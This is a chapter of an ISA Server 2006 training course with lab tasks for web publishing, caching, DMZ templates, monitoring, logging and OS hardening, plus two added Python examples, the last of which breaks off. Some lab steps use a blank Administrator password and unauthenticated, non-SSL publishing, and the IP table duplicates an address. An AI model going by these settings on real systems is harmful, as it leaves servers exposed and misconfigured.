Configuring a Web Publishing Rule
Setup: You must be logged on to Windows 2003 Server as an administrator
and have completed the previous tasks. In this exercise, you will create an
ISA Server publishing rule to allow external access to an internal website.
1. In ISA Server Management, expand the Console Tree pane and select the
Firewall Policy container.
2. In the Tasks pane, select the Tasks tab.
3. On the Tasks tab, under the Firewall Policy Tasks section, click the Publish
Web Sites link.
4. In the New Web Publishing Rule Wizard, in the Web Publishing Rule Name
field, type Public Web Server and click Next.
5. In the Select Rule Action dialog box, select the Allow radio button and
click Next.
6. In the Publishing Type dialog box, select the Publish A Single Web Site Or
Load Balancer option and click Next.
7. On the Connection Security tab, select the Use Non-secured Connections
To The Published Web Server Or Server Farm option and then click
Next.
8. In the Internal Publishing Details dialog box, enter the following values:
Internal site name: www.securitycertified.net
Computer name or IP address: 10.X.Y.100 (where X and Y are the second
and third octets of your internal interface, the loopback adapter).
Click Next.
9. In the Internal Publishing Details dialog box, in the Path (Optional) field,
type /* and click Next.
10. In the Public Name Details dialog box, in the Public Name field, type
www.securitycertified.net and click Next.
11. In the Select Web Listener dialog box, click the New button.
12. In the New Web Listener Definition Wizard dialog box, in the Web Listener
Name field, type Public Web Listener and click Next.
13. In the Client Connection Security dialog box, select the Do Not Require
SSL Secured Connections With Clients option and click Next.
14. In the Web Listener IP Addresses dialog box, select the External Network
and click Next.
15. In the Authentication Settings dialog box, from the Select How Clients Will
Provide Credentials To ISA Server drop-down list, select No Authentication
and click Next.
16. Read the Single Sign On Settings dialog box and then click Next.
17. In the Completing The New Web Listener Wizard, click Finish.
18. In the Select Web Listener dialog box, click Next.
19. In the Authentication Delegation dialog box, select the No Delegation, and
client cannot authenticate directly option and click Next.
20. In the User Sets dialog box, accept the default of All Users and click
Next.
21. In the Completing the New Web Publishing Rule Wizard dialog box, click
Finish.
22. At the top of the Firewall Policy Details pane, click Apply.
23. In the Saving Configuration Changes dialog box, click OK.
24. The new publishing rule appears at the top of the Details pane.
25. In the Tasks pane, click the Toolbox tab and then expand the Network
Objects container.
26. Expand the Web Listener container. (Note: you may need to refresh your
screen with F5 to perform this step.)
27. The web listener created during the publishing rule creation is now listed.
You may have to click another container in the Console Tree pane and then
reselect the Firewall Policy container to refresh the screen.
You have now configured a Web Publishing rule that will use a web listener to
listen for inbound requests from the external network for www.securitycertified.net
and then forward them to the internal web server. Since only port 80 is
exposed to the external network, and ISA Server is inspecting the inbound HTTP
packets before passing them on to the internal web server, the security footprint
of your web server is greatly enhanced.
ISA Server 2006 Caching
Caching is a method where frequent requests for remote resources or content are
stored locally on the ISA Server. By maintaining a centralized cache of frequently
requested content, both network bandwidth consumption and browser
performance are improved. Caching is disabled by default when you install ISA
Server 2006, so you will need to enable and configure caching if you want to take
advantage of the performance benefits this feature offers.
ISA Server supports two types of caching: forward caching and reverse caching.
Forward caching provides internal clients with improved access times to external
resources, while reverse caching provides the same benefits to external clients
accessing web content that has been published through ISA Server. When you
create a cache rule, it applies to all requested sites, regardless of the source
network.
ISA Server allows organizations to configure caching to preload entire websites
into cache on a defined schedule. Scheduling cache downloads will help keep
cache content up-to-date for your users and also ensure that cached content from
web servers that are offline remains available to your users.
ISA Server has a caching algorithm that allows it to make intelligent decisions
about when certain content is no longer requested on a regular basis. This
algorithm enables ISA Server to flush rarely requested content from RAM cache to
disk cache so that the cache remains as efficient as possible.
ISA Server has three main configuration items for controlling caching:
Cache Drive Settings
Cache Drive Rules
Content Download Jobs
TASK 5B-13
Enabling and Configuring Caching
Setup: You must be logged on to Windows 2003 Server as an administrator
and have completed the previous tasks.
1. In ISA Server Management, expand the Console Tree pane and select the
Cache container.
2. Notice that the Cache container has a red down arrow on it in the Console
Tree pane, indicating that it is currently not enabled.
3. Notice that the Details pane contains three tabs corresponding to the three
configuration items for caching discussed earlier.
4. Notice that the Cache Size on NTFS Drives is currently zero.
5. In the Tasks pane, under Cache Drive Tasks, click the Define Cache Drives
(Enable Caching) link.
6. In the Define Cache Drives dialog box, in the Maximum Cache Size (MB)
field, type 100 and then click the Set button.
7. Drive C now shows a cache size of 100. If you had multiple drive arrays on
your ISA Server, each partition formatted with NTFS would show as an
option in this dialog box.
8. In the Define Cache Drives dialog box, click OK.
9. At the top of the Firewall Policy Details pane, click Apply.
10. In the ISA Server Warning dialog box, select the Save The Changes And
Restart The Services radio button and click OK. (This may take a
moment; be patient!)
11. In the Saving Configuration Changes dialog box, click OK.
12. In the Details pane, click the Cache Rules tab.
13. Notice that two default rules have been pre-defined.
ISA Server comes with a pre-defined cache rule for the Microsoft Update
site. This can help speed up automatic downloads of patches by clients or
WUS servers.
14. On the Tasks tab, under the Cache Rules Tasks, click the Create A Cache
Rule link.
15. In the New Cache Rule Wizard, in the Cache Rule Name field, type Security
Certified Web Site and click Next.
16. In the Cache Rule Destination dialog box, click Add.
17. In the Add Network Entities dialog box, expand the Network Sets object.
18. In the Add Network Entities dialog box, select the All Protected Networks
object.
19. In the Add Network Entities dialog box, click Add.
20. In the Add Network Entities dialog box, click Close.
21. In the Cache Rule Destination dialog box, click Next.
22. In the Content Retrieval dialog box, select the Only If A Valid Version Of
The Object Exists In The Cache. If No Valid Version Exists, Route The
Request To The Server. option and then click Next.
23. In the Cache Content dialog box, check the Dynamic Content check box.
24. In the Cache Content dialog box, check the Content For Offline Browsing
(302, 307 Responses) check box and click Next.
25. In the Cache Advanced Configuration dialog box, click Next.
26. In the HTTP Caching dialog box, accept the defaults and click Next.
27. In the FTP Caching dialog box, deselect the Enable FTP Caching option
and then click Next.
28. In the New Cache Rule Wizard dialog box, click Finish.
29. At the top of the Details pane, click the Apply button.
30. In the Saving Configuration Changes dialog box, click OK.
31. In the Details pane, select the Content Download Jobs tab.
32. In the Tasks pane, click the Schedule A Content Download Job link.
33. Read the Enable Schedule Content Download Jobs dialog box and then
click Yes. (This will configure the required options to schedule a content
download job.)
34. At the top of the Details pane, click the Apply button.
35. In the Saving Configuration Changes dialog box, click OK.
36. In the Task pane, click the Schedule A Content Download Job link.
37. In the New Content Download Job Wizard dialog box, in the Content Download
Job Name field, type Security Certified Web Site Download and click Next.
38. In the Download Frequency dialog box, select the Daily option and click
Next.
39. In the Daily Frequency dialog box, under the Job Start Date field, set the
date to start tomorrow and then click Next.
40. In the Content Download dialog box, type http://www.securitycertified.net as
the URL and select the Do Not Follow Link Outside The Specified URL
Domain Name option.
41. In the Content Download dialog box, select the Maximum Depth Of Links
Per Page option.
42. In the Content Download dialog box set the Maximum Depth Of Links
Per Page value to 4 and click Next.
43. In the Content Caching dialog box, accept the default Cache Content and
TTL settings and click Next.
44. In the Completing the Scheduled Content Download Job Wizard dialog box,
click Finish.
45. Your new content download job appears in the details pane.
46. Close ISA Server 2006 Management console.
Configuring ISA Server 2006 Network Templates
Earlier in this topic, we discovered that ISA Server 2006 uses rule elements called networks to define one or more ranges of IP addresses. Networks usually correspond to a physical network. In addition to the access rule network element, ISA Server 2006 includes a new feature: network templates, which are aligned to the common firewall network topologies. These network templates can be used to configure the rule elements that the firewall policy needs for ISA's rules-based traffic control between networks.
The Networks container in the Console Tree pane provides you with three tabs in the Details pane that allow you to configure your network elements. These configuration tabs are:
Network Sets
Network Rules
Web Chaining
Currently, our ISA Server firewall is configured as a perimeter or edge firewall. If we add a third network interface to the ISA Server, we can then re-configure the network topology to include a DMZ and create a three-legged DMZ firewall topology. This type of upgrade is not uncommon in the real world. ISA Server makes it easy to re-configure through the use of pre-defined network templates.
TASK 5B-14
Install Second Microsoft Loop Back Adapter and Assign
an IP Address
Setup: You must be logged on to Windows 2003 Server as an administrator, have completed the previous tasks, and have access to the Windows 2003 Server installation source files.
1. Choose Start→Control Panel→Add Hardware.
2. In the Welcome dialog box, click Next.
3. Select Yes, I Have Already Connected The Hardware and click Next.
4. Scroll to the bottom of the Installed Hardware list box and select Add A
New Hardware Device. Then, click Next.
5. Select the Install The Hardware That I Manually Select From A List
(Advanced) option and click Next.
6. Under Common Hardware Types, select Network Adapters, and then click
Next.
7. Under Manufacturer, select Microsoft.
8. Under Network Adapter, select Microsoft Loopback Adapter.
9. Click Next twice.
10. If required, click OK in the Insert Disk dialog box.
11. Enter the path to the Windows 2003 Server installation source files in the Files Needed dialog box and then click OK. (Windows Server 2003 should remember that source path from the first loopback adapter we installed earlier.)
12. Click Finish.
13. Choose Start→Control Panel→Network Connections→Local Area Connection.
14. In the Local Area Connection dialog box, click Properties.
15. In the This Connection Uses The Following Items list, select Internet Pro-
tocol (TCP/IP) and then click Properties.
16. On the General tab, select Use The Following IP Address and enter the
address from the table below that corresponds to your computer name.
WIN-R01 - 192.168.16.1/24    WIN-L01 - 192.168.18.1/24
WIN-R02 - 192.168.16.2/24    WIN-L02 - 192.168.18.2/24
WIN-R03 - 192.168.16.3/24    WIN-L03 - 192.168.18.3/24
WIN-R04 - 192.168.16.4/24    WIN-L04 - 192.168.18.4/24
WIN-R05 - 192.168.16.5/24    WIN-L05 - 192.168.18.5/24
WIN-R06 - 192.168.16.7/24    WIN-L06 - 192.168.18.6/24
WIN-R07 - 192.168.16.8/24    WIN-L07 - 192.168.18.7/24
WIN-R08 - 192.168.16.8/24    WIN-L08 - 192.168.18.8/24
Note that the subnet mask is 255.255.255.0 for all these IPs.
17. Leave the DNS value blank and then click OK.
18. Click Close to close the NIC Properties.
19. Choose Start→Control Panel and right-click Network Connections. From the context menu, choose Open.
20. Right-click the Local Area Connection, and from the context menu, choose Rename.
21. Name the connection DMZ.
22. Close the Network Connections window.
You have now installed a second Microsoft Loopback adapter and assigned it a unique IP address. We will be using this adapter to function as our DMZ network adapter to configure ISA Server 2006 in a three-legged DMZ.
TASK 5B-15
Configure ISA Server 2006 in a Three-legged DMZ
Setup: You must be logged on to Windows 2003 Server as an administrator and have completed the previous tasks. You will reconfigure your network as a three-legged DMZ topology. To accomplish this, you must first import the originalcfg.xml file to remove the web access policy listener that you configured in the publishing task.
1. Choose Start→All Programs→Microsoft ISA Server→ISA Server Management.
2. In the Console Tree pane, select the [Your Server Name] container.
3. In the Tasks pane, click the Import (Restore) This ISA Server Configuration link.
4. In the Import Wizard dialog box, click Next.
5. In the Select The Import File dialog box, in the File Name field, type C:\originalcfg.xml and click Next. Alternatively, you could use the Browse button to locate the file.
6. In the Import Action dialog box, select the Overwrite (Restore) option and
then click Next.
7. In the Import Preferences dialog box, check the Import User Permission
Settings check box, and then click Next.
8. In the Completing The Import Wizard dialog box, click Finish.
9. Read the ISA Server warning dialog box and then click OK twice.
10. At the top of the Details pane, click the Apply button.
11. In the Saving Configuration Changes dialog box, click OK.
12. In the Console Tree pane, select the Firewall Policy container. Notice that the firewall rule sets in the Details pane are back to the defaults.
13. In the Console Tree pane, select the Networks container.
14. In the Tasks pane, expand Configuration, and select the Templates tab.
15. On the Templates tab, select the 3-Leg Perimeter template.
16. In the Welcome To The Network Template Wizard dialog box, click Next.
17. In the Export The ISA Server Configuration dialog box, click Next.
18. In the Internal Network IP Addresses dialog box, click Next.
19. In the Perimeter Network IP Addresses dialog box, click Add Adapter.
20. In the Select Network Adapters dialog box, select the DMZ network and
click OK.
21. In the Perimeter Network IP Addresses dialog box, click Next.
22. In the Select A Firewall Policy dialog box, scroll down and select the
Allow Limited Web Access policy. Then, click Next.
23. In the Completing The Network Template Wizard dialog box, click Finish.
24. At the top of the Details pane, click the Apply button.
25. In the Saving Configuration Changes dialog box, click OK.
26. In the Console Tree pane, select the Firewall Policy container.
27. Highlight the Web Access Only Firewall Policy.
28. Notice that there are new access rules configured based on the template options we chose in the previous steps.
Configuring ISA Server Monitoring
ISA Server 2006 has a robust set of monitoring features. By configuring alerts, reporting, performance monitoring and logging, you can see at a glance the status and health of your ISA Server 2006 firewall. The Monitoring Details pane has the largest number of tabs associated with it of any of the ISA Console Tree pane containers. Spend plenty of time learning about each of the monitoring features and working with their configuration. The more skilled you are with this toolset, the easier it is to manage your ISA Server 2006 firewall.
These features are summarized in the following table.
Figure 5-19: ISA Server 2006 monitoring features.
The ISA Server 2006 Management console can be used to gather at-a-glance information on the status of your ISA Server. To view the real-time monitoring information, open the Management console and select the Monitoring container from the Console Tree pane. This will activate the Monitoring Details pane. On the Dashboard tab of the Monitoring Details pane, you will find visual displays of current monitoring information. The refresh rate of this display is configurable in the task pane. Each of the individual information displays can also be collapsed to make more screen room for other displays.
Figure 5-20: The Monitoring Details pane Dashboard tab.
TASK 5B-16
Working with Alerts
Setup: You must be logged on to Windows 2003 Server as an administrator and have completed the previous tasks. In this task, you will configure a custom alert for network disconnections and assign it actions to perform when the alert is triggered.
1. In ISA Server, with the Console Tree pane open, select the Monitoring
container.
2. In the Details pane, select the Alerts tab.
3. In the Tasks pane, click the Configure Alert Definitions link.
4. In the Alerts Properties dialog box, scroll briefly through the list and look at the wide range of pre-configured alerts in ISA Server. Then, click Add.
5. In the New Alert Wizard dialog box, in the Alert Name field, type Network Interface Disconnected and click Next.
6. In the Events And Conditions dialog box, from the Event drop-down list, select Network Configuration Changed, and from the Additional Condition drop-down list, select Network Disconnected. Click Next.
7. In the Category And Severity dialog box, from the Category drop-down list, select Network Load Balancing, and from the Severity drop-down list, select Error. Then, click Next.
8. In the Actions dialog box, select the Send An E-mail Message and the
Report The Event To The Windows Event Log options and then click
Next.
9. In the Sending E-mail Messages dialog box, enter the following values:
SMTP server: smtp.securitycertified.net
From: isa2006@securitycertified.net
To: yourname@securitycertified.net
Click Next.
10. In the Completing The New Alert Configuration Wizard, click Finish.
11. In the Alerts Properties dialog box, scroll down and ensure that your new
Network Interface Disconnected alert is selected, then click OK.
12. At the top of the Details pane, click the Apply button.
13. In the Saving Configuration Changes dialog box, click OK.
14. You have now configured ISA Server 2006 alerts to send you an email message and log a Windows Event Viewer event whenever a network interface is disconnected. This could speed up your response time to physical problems with the ISA Server network segments.
15. Minimize your ISA Server 2006 Management console.
Alerts associated with actions such as sending an email will help you respond to critical ISA Server events in a timely fashion. Even configuring certain warning items to send an email alert can help you take proactive steps to ensure the ISA Server 2006 firewall remains in optimum condition.
TASK 5B-17
Working with Reports
Setup: You must be logged on to Windows 2003 Server as an administrator and have completed the previous tasks. You will configure ISA Server 2006 to create a one-time report and to create scheduled reports for monitoring baselines and security performance evaluations.
1. From the Start menu, open Windows Explorer.
2. Create the directory C:\ISA-Reports.
3. Minimize Windows Explorer.
4. Maximize your ISA Server.
5. Expand the Console Tree pane and select the Monitoring container.
6. In the Details pane, select the Reports tab.
7. On the Tasks tab, click the Generate A New Report link.
8. In the New Report Wizard dialog box, in the Report Name field, type Snapshot Report and click Next.
9. In the Report Content dialog box, accept the default of all content choices
and click Next.
10. In the Report Period, leave the default start and stop date and click Next.
11. In the Report Publishing dialog box, check the Publish Reports To A Directory check box.
12. In the Report Publishing dialog box, click the Browse button.
13. In the Browse For Folder dialog box, browse to C:\ISA-Reports, select it,
and click OK.
14. In the Report Publishing dialog box, check the Publish Using This Account
check box and then click the Set Account button.
15. In the Set Account dialog box, click the Browse button.
16. In the Select User dialog box, in the Enter The Object Name To Select eld,
type Administrator and then click Check Name. Click OK.
17. In the Password and Confirm Password fields, type the Administrator password and then click OK. (Your password should be blank.)
18. In the Report Publishing dialog box, click Next.
19. In the Send E-mail Notification dialog box, leave the defaults blank, and click Next.
20. In the Completing The New Report Wizard dialog box, click Finish.
21. Restore your minimized Windows Explorer and browse to the C:\ISA-
Reports directory.
22. Open the Snapshot Report [Date Range] folder and double-click the
contents.htm le.
23. Right-click the Allow Blocked Content bar at the top of the browser
screen and choose Allow Blocked Content. Then, click Yes.
24. On the Summary page, click the Protocols link. Scroll through the report
and examine the types of items that are reported.
25. The report contains no significant data because your ISA Server has not passed a large number of packets to register monitoring statistics yet.
26. When you have finished examining the report, close your Internet Explorer windows and close Windows Explorer.
27. In the Tasks pane, click the Create And Configure Report Jobs link.
28. In the Report Jobs Properties dialog box, click Add.
29. In the New Report Job Wizard dialog box, in the Report Job Name field, enter Daily Report and click Next.
30. In the New Report Content dialog box, accept the default all content types
and click Next.
31. In the Report Job Schedule dialog box, select the Daily option and click
Next.
32. In the Reports Publishing dialog box, check the Publish Reports To A
Directory check box.
33. In the Report Publishing dialog box, click the Browse button.
34. In the Browse For Folder dialog box, browse to C:\ISA-Reports, select it,
and then click OK.
35. In the Report Publishing dialog box, check the Publish Using This Account
check box and then click the Set Account button.
36. In the Set Account dialog box, click the Browse button.
37. In the Select User dialog box, in the Enter The Object Name To Select field, type Administrator and then click Check Name. Type Administrator (no password) and click OK.
38. In the Report Publishing dialog box, click Next.
39. In the Send E-Mail Notification dialog box, leave the defaults blank, and click Next.
40. In the Completing The New Report Job Wizard dialog box, click Finish.
41. In the Report Jobs Properties dialog box, select the Daily Report option
and click OK.
42. At the top of the Details pane, click the Apply button.
43. In the Saving Configuration Changes dialog box, click OK.
In this task, you successfully configured ISA Server 2006 reporting options. You examined a snapshot report and created a scheduled reporting job. ISA Server reports are very comprehensive and can give you an accurate picture of what is taking place on your ISA Server firewall.
ISA Server 2006 Logging
While alerts give you real-time notification of ISA Server events, logging allows you to view events in an historical fashion. This can help you analyze the traffic patterns on your network for such purposes as policy formulation, intrusion attempt analysis, network usage analysis, and as an aid in troubleshooting ISA Server.
Figure 5-21: ISA Server 2006 logging features.
ISA Server divides logging into two logs: the Web Proxy logs, which record ISA
Server traffic handled by Web Proxy Filter; and the Firewall service logs, which
record ISA Server traffic handled by the Microsoft Firewall service.
ISA Server features a variety of log storage options that enable you to track traffic that has been handled by ISA Server. The default ISA Server 2006 logging location is a local MSDE database on the ISA Server. The database file for the logs can be found in the C:\Program Files\Microsoft ISA Server\ISALogs folder and is named ISALOG_yyyymmdd_xxx_nnn, where:
yyyy = year
mm = month
dd = day of the month
xxx = log file type (ISA or WEB)
nnn = order number for sequencing daily logs
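The naming scheme above is what a reviewer has to work with when checking that the ISALogs folder holds a complete history. The following added example (not code from the course or from ISA Server) parses names of the form ISALOG_yyyymmdd_xxx_nnn, flags files that do not follow the scheme, and reports days on which a log type's nnn sequence has a hole; the .mdf extension and the directory listing are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import date

# Base name per the course text: ISALOG_yyyymmdd_xxx_nnn with xxx = ISA or WEB.
# The extension is an assumption (the page gives only the base name); the
# pattern tolerates one without requiring it.
LOG_NAME = re.compile(
    r"^ISALOG_(\d{4})(\d{2})(\d{2})_(ISA|WEB)_(\d{3})(?:\.[A-Za-z0-9]+)?$"
)


def parse_log_name(name):
    """Return (date, log_type, sequence) for a name that follows the scheme,
    or None for anything else (including an impossible calendar date)."""
    m = LOG_NAME.match(name)
    if m is None:
        return None
    yyyy, mm, dd, xxx, nnn = m.groups()
    try:
        when = date(int(yyyy), int(mm), int(dd))
    except ValueError:
        return None
    return when, xxx, int(nnn)


def audit_log_names(names):
    """Report (a) files in the log folder that do not follow the naming scheme
    and (b) days on which a log type's nnn sequence has a hole, which is the
    kind of gap worth explaining before trusting the log history."""
    by_day = defaultdict(list)
    unknown = []
    for name in names:
        parsed = parse_log_name(name)
        if parsed is None:
            unknown.append(name)
            continue
        when, xxx, nnn = parsed
        by_day[(when, xxx)].append(nnn)
    gaps = {}
    for key, seqs in by_day.items():
        seen = set(seqs)
        missing = [n for n in range(min(seqs), max(seqs) + 1) if n not in seen]
        if missing:
            gaps[key] = missing
    return {"unknown": sorted(unknown), "gaps": gaps, "days": sorted(by_day)}


# Constructed directory listing standing in for the ISALogs folder.
SAMPLE_LISTING = [
    "ISALOG_20240301_ISA_000.mdf",
    "ISALOG_20240301_ISA_001.mdf",
    "ISALOG_20240301_WEB_000.mdf",
    "ISALOG_20240302_ISA_000.mdf",
    "ISALOG_20240302_ISA_002.mdf",   # 001 is absent: a sequence gap
    "ISALOG_20241301_ISA_000.mdf",   # month 13: not a valid log name
    "thumbs.db",                     # unrelated file in the folder
]

if __name__ == "__main__":
    print(audit_log_names(SAMPLE_LISTING))
```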
Using a database for logging instead of logging to a text file gives ISA Server powerful reporting capabilities for the log information. ISA Server can redirect the log file storage location to either a SQL database or to text files. The ability to use a single SQL database server for multiple ISA servers allows you to centralize the management, auditing, and backup of the ISA logs. And of course, if you need the log files to be stored in a .txt file format for any reason, that option is available. If you choose to store the ISA Server logs on a centralized SQL server, you need to ensure that ISA Server and the SQL Server have reliable high-speed Internet connections between them. This precludes ISA from logging to SQL over a slow WAN link. Microsoft recommends a minimum connection speed of 100 Mbps between ISA and SQL.
It is also worth noting that, by default, access rules are configured to log the packets that match that specific rule. If you don't want logging to record actions for a specific access rule in your firewall policy, then you must disable this option on the Actions tab of the rule property sheet.
Figure 5-22: ISA Server 2006 Rule logging options are enabled by default.
TASK 5B-18
Configuring Logging Options
Setup: You must be logged on to Windows 2003 Server as an administrator and have completed the previous tasks. In this task, you will examine ISA Server 2003 logging options.
1. In ISA Server, expand the Console Tree pane and select the Monitoring
container.
2. On the Details pane, select the Logging tab.
3. On the Tasks tab, click the Edit Filter link.
4. In the Edit Filter dialog box, under the Filter By column, select the Action filter and then click the Remove button.
5. In the Edit Filter dialog box, from the Filter By drop-down list, select
Protocol.
6. In the Edit Filter dialog box, from the Condition drop-down list, select
Contains.
7. In the Edit Filter dialog box, from the Value drop-down list, select NetBIOS Name Service and then click the Add To List button.
8. In the Edit Filter dialog box, click the Start Query button.
9. Notice that the Details pane now reports Fetching Results.
10. Open a command prompt and arrange your desktop where you can see
the results section of the Details pane while typing in the command
prompt.
11. In the command prompt, type NET VIEW and then press Enter.
12. Wait until logging events show in the Details pane and then close the
command prompt.
13. In the Task pane, click the Stop Query link.
14. In the Task pane, click the Configure Firewall Logging link.
15. The Log tab of the Firewall Logging Properties dialog box is where you would change what log file format ISA Server uses. Examine the available properties and then click the Fields tab.
16. Examine the list of available logging fields that are available in ISA Server 2006.
17. Scroll down in the Fields tab and check the Network Interface check box. Then, click OK.
18. At the top of the Details pane, click the Apply button.
19. In the Saving Configuration Changes dialog box, click OK.
20. In the Task pane, click the Configure Web Proxy Logging link.
21. The Log tab of the Web Proxy Logging Properties dialog box is where you would change what log file format ISA Server uses. Examine the available properties and then click the Fields tab.
22. Examine the list of available logging fields that are available in ISA Server 2006.
23. Scroll down in the Fields tab and check the Service check box, and then
click OK.
24. At the top of the Details pane, click the Apply button.
25. In the Saving Configuration Changes dialog box, click OK.
26. Close the ISA Server 2006 Management console.
You have now successfully used ISA logging to review real-time events and also configured both the Firewall logging and Web Proxy logging to log additional events. One useful tip to keep in mind is that if you are using database format as your logging method, you can use Access or other front-end tools to create custom queries and reports from the ISA Server log databases.
Additional Configuration Options for ISA Server 2006
ISA Server 2006 contains many more configuration options than can be covered in the scope of this course. There are a few options, however, that are worth taking your time here to discover and examine. The three options we are going to discuss are:
Securing the ISA Server OS with the Security Configuration Wizard
ISA Server Packet Prioritization
Uninstalling ISA Server 2006
ISA Server 2006 runs on top of the Windows Server 2003 operating system. In order for ISA Server to be secure, the underlying OS must also be secured. Windows Server 2003 Service Pack 1 included an attack surface reduction tool called the Security Configuration Wizard. The Security Configuration Wizard allows you to select a role for the server OS and then secure it based on the template you choose. It does this by determining the minimum functionality required in the OS, and then disables functions that are not required. The default templates included with the Security Configuration Wizard do not contain a configuration for ISA Server 2006; however, you can download an update package from the Microsoft TechNet website that will update the Security Configuration Wizard with templates for ISA Server 2006. This can greatly simplify the process of securing the underlying OS for ISA Server.
In order to use the Security Configuration Wizard (or update it), you must first install it from the Add/Remove Windows Components control panel applet. Even if you have already secured the OS before installing ISA Server, the Security Configuration Wizard can ensure that you have not overlooked anything. Also, running a scan against the ISA Server OS using MBSA (Microsoft Baseline Security Analyzer) or another vulnerability scanning tool will help ensure that ISA Server is as solid as you can make it.
TASK 5B-19
Securing ISA Server 2006 with the Security
Configuration Wizard
Setup: You must be logged on to Windows 2003 Server as an administrator and have completed the previous tasks. You must also have access to the Windows Server 2003 source installation files and the ISA Server 2006 Security Configuration Wizard update package (IsaScwHlpPack.EXE).
1. Choose Start→Control Panel→Add Remove Programs.
2. Click the Add/Remove Windows Components button.
3. In the Add/Remove Windows Components dialog box, scroll down and check the Security Configuration Wizard check box and then click Next.
4. If required, enter the path to the Windows Server 2003 source files.
5. Click Finish and then close the Add Remove Programs control panel applet.
6. Double-click the IsaScwHlpPack.exe located in C:\Tools\Lesson5.
7. In the ISA Server Security Configuration Wizard Update dialog box, click Yes.
8. In the ISA Server Security Configuration Wizard Update dialog box, type C:\Update for the path and then click OK.
9. To create the C:\Update folder, click Yes, and then click OK in the success dialog box.
10. Choose Start→Administrative Tools→Security Configuration Wizard.
11. In the Security Configuration Wizard dialog box, click Next.
12. Select the Create A New Security Policy radio button and click Next.
13. In the Select Server dialog box, verify the name of your server and then click Next.
14. In the Processing Security Configuration Database dialog box, click Next.
15. In the Role-Based Service Collection dialog box, click Next.
16. In the Select Server Roles dialog box, de-select all options except
Microsoft Internet Security and Acceleration Server 2004 and click Next.
(ISA 2004 and ISA 2006 have the same OS requirements so the same tem-
plate works for both.)
17. In the Select Client Features dialog box, de-select all options except Auto-
matic Update Client and click Next.
18. In the Select Administration And Other Options dialog box, accept the
defaults and click Next.
19. In the Select Additional Services dialog box, accept the defaults and click
Next.
20. In the Handling Unspecified Services dialog box, select the Disable The Service option and click Next.
21. In the Confirm Service Changes dialog box, scroll through and review the changes that will be made and then click Next.
22. In the Network Security dialog box, ensure that the Skip This Section option is selected and then click Next. (ISA will handle our firewall requirements. We don't want to create conflicts with the built-in Windows Firewall.)
23. In the Registry Settings dialog box, leave the Skip option unselected and then click Next.
24. In the Require SMB Security Signatures dialog box, check both option boxes and then click Next.
25. In the Outbound Authentication Methods dialog box, select the Local Accounts On The Remote Computers option and then click Next.
26. In the Outbound Authentication Methods dialog box, select the Clocks That Are Synchronized With The Selected Server's Clock option and then click Next.
27. In the Inbound Authentication Methods dialog box, accept the defaults and
then click Next.
28. In the Registry Settings Summary dialog box, review the changes and then
click Next.
29. In the Audit Policy dialog box, ensure that the Skip option is not selected
and then click Next.
30. In the System Audit Policy section, select the Audit Successful And Unsuc-
cessful Activities radio button and then click Next.
31. In the Audit Policy Summary dialog box, read the summary and then click
Next.
32. In the Save Security Policy dialog box, click Next.
33. In the Security Policy File Name dialog box, append \ISAConfiguration to the path and then click Next.
34. In the Apply Security Policy dialog box, select the Apply Now option and
then click Next.
35. In the Completing The Security Configuration Wizard dialog box, click the Finish button.
You have successfully used the Security Configuration Wizard to configure the optimum security configuration settings for the Windows Server 2003 operating system that ISA Server 2006 is running on top of.
Packet Prioritization
Not all traffic that passes through your ISA Server 2006 firewall will have the same importance. This can be a real issue for an organization with limited outbound bandwidth. For example, a brokerage firm branch office might need up-to-the-second information offered by a web service at the main office. This data would be considered high priority for making fast decisions when watching trading prices or other important financial data. Ensuring that requests to this web service get high priority would be beneficial to the brokerage firm.
ISA Server 2006 provides packet prioritization for limited bandwidth scenarios by implementing the Differentiated Services (DiffServ) protocol. The DiffServ protocol provides a framework that enables deployment of scalable service discrimination over the Internet. DiffServ uses a marker in the IP header of each packet to assign it a priority level.
It is important to note that this is a global setting and not assigned to a specific rule. ISA Server packet prioritization is a policy setting for HTTP traffic. It will apply to all HTTP traffic that traverses your ISA Server. The DiffServ web filter, built into ISA Server, scans packets for a specific set of URLs or domain names and assigns those packets a priority.
The DiffServ filter has a high priority in ISA Server because it must be aware of the size of both the request and the response. To gain this awareness, DiffServ must inspect the HTTP packets at the point where ISA Server sends or receives the traffic.
ISA Server can only add DiffServ bits to HTTP or HTTPS traffic. It does not flag any other protocols with a priority level, nor does Microsoft guarantee that ISA Server will transmit DiffServ bits on any other protocol it receives. For packet prioritization to work, the routers in the traffic transit path must support QoS (Quality of Service) functionality.
Once you enable DiffServ on ISA Server, you can then configure the URLs and/or domains you want to prioritize.
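To make the mechanism concrete, here is an added example (not code from the course or from ISA Server) that shows where the six DiffServ bits land in the IP header and how a URL/domain priority table like the one configured in Task 5B-20 decides which bits a request gets. The priority name, bits and URL are the task's own values; the domain table and the matching rules (exact host for URL entries, host-or-subdomain for domain entries) are assumptions.

```python
from urllib.parse import urlsplit

# Priority table as configured on the ISA DiffServ Priorities and URLs tabs.
PRIORITIES = {"Branch Office Priority": "010100"}      # priority name -> DiffServ bits
URL_PRIORITIES = {"brokeragehouse.securitycertified.net": "Branch Office Priority"}
DOMAIN_PRIORITIES = {}   # assumed shape: {"securitycertified.net": "Branch Office Priority"}


def dscp_to_tos_byte(bits):
    """The six DiffServ bits occupy the high six bits of the IP ToS/DS field;
    the low two bits are ECN and are left at zero by DiffServ marking."""
    if len(bits) != 6 or set(bits) - {"0", "1"}:
        raise ValueError("DiffServ bits must be six binary digits")
    return int(bits, 2) << 2


def dscp_name(bits):
    """Well-known code point names (EF, CSx, AFxy) for a six-bit DSCP value,
    so the bits typed into ISA can be checked against the router policy."""
    v = int(bits, 2)
    if v == 46:
        return "EF"
    if v % 8 == 0:
        return f"CS{v // 8}"
    cls, low = v >> 3, v & 7          # AFxy encodes as 8*x + 2*y
    if 1 <= cls <= 4 and low in (2, 4, 6):
        return f"AF{cls}{low // 2}"
    return "unassigned"


def priority_for(url):
    """Decide which priority the DiffServ filter would assign to a request.
    Only http/https is marked (the text's caveat); URL entries match the host
    exactly, domain entries match the host and its subdomains.
    Returns (priority name, bits) or None when the packet is left unmarked."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    if parts.scheme not in ("http", "https"):
        return None
    host = (parts.hostname or "").lower()
    name = URL_PRIORITIES.get(host)
    if name is None:
        for domain, pname in DOMAIN_PRIORITIES.items():
            if host == domain or host.endswith("." + domain):
                name = pname
                break
    if name is None:
        return None
    return name, PRIORITIES[name]


if __name__ == "__main__":
    bits = PRIORITIES["Branch Office Priority"]
    print(bits, dscp_name(bits), hex(dscp_to_tos_byte(bits)))
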